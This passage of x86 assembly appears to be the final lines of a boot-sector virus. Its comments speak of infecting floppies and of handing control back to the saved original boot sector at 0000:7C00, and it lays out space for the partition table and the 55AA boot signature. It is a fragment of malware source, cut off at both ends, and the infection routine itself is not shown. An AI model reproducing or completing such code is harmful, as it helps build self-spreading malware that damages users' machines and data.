BYTE PTR [si],0 ;floppies when we infect them rep movsb xor ax,ax ;now go execute old boot sector push ax ;at 0000:7C00 mov ax,OFFSET BOOT_START push ax retf ORG 7DBEH PART: DB 40H dup (?) ;partition table goes here ORG 7DFEH DB 55H,0AAH ;boot sector ID goes here ENDCODE: ;label for the end of boot sec COMSEG ENDS END START